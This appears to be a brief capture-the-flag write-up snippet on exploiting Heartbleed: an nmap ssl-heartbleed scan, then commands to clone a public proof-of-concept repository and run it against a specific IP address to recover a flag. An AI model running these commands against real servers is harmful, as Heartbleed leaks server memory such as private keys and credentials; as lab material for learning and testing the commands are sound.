nmap -p 443 --script ssl-heartbleed $VICTIM
I had to run the exploit a couple times but eventually I found some interesting info. Most importantly the flag.
git clone https://github.com/mpgn/heartbleed-PoC.git
cd heartbleed-PoC/
python2.7 heartbleed-exploit.py 34.240.174.225